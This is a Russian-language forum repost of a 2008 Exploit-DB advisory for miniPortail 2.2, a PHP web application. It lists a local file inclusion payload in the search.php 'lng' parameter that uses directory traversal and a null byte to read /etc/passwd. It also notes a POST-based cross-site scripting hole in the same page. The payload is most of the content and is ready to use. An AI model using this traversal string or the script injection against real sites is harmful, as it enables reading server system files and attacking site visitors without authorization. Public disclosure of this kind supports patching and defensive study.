Exploit miniPortail 2.2 - Cross-Site Scripting / Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6821
Проверка EDB
  1. Пройдено
Автор
STAKER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-6168 cve-2008-6167
Дата публикации
2008-10-23
Код:
/*

   miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities
   -------------------------------------------------------
   By StAkeR - StAkeR[at]hotmail[dot]it
   http://www.easy-script.com/scripts-dl/miniportail.zip
   -------------------------------------------------------
   
   -1 Local File Inclusion
   -  search.php?lng=../../../../../../etc/passwd%00
   
   -2 Cross Site Scritping (POST)
   -  search.php (<script>[javascript]</script>)
   
*/

# milw0rm.com [2008-10-23]
 
Источник
www.exploit-db.com

Похожие темы